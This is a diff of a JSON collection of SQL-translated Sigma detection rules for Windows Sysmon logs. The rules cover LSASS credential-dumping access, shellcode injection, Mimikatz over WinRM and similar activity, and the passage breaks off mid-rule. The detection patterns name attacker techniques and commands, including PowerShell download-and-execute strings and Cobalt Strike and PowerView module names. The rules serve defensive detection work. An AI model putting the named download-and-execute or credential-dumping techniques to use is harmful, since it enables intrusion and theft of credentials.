"459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Updaters and installers are typical false positives. 
Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND 
SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Roaming\\\\ViberPC\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\updater.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Common Files\\\\Adobe\\\\ARM\\\\%' ESCAPE '\\') AND SourceImage LIKE '%\\\\AdobeARMHelper.exe' ESCAPE '\\' AND GrantedAccess = '0x1410')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Credential Dumping Tools Accessing LSASS Memory", + "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. 
This is typical for credentials dumping tools", + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002", + "car.2019-04-004" ], "falsepositives": [ - "Unknown" + "Likely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE 
'%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE 
'%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", - "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll 
for win10, server2016 and up.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": 
"472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Suspicious Driver Install by pnputil.exe", - "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "status": "test", - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547" + 
"attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR 
GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", - "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { 
- "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE 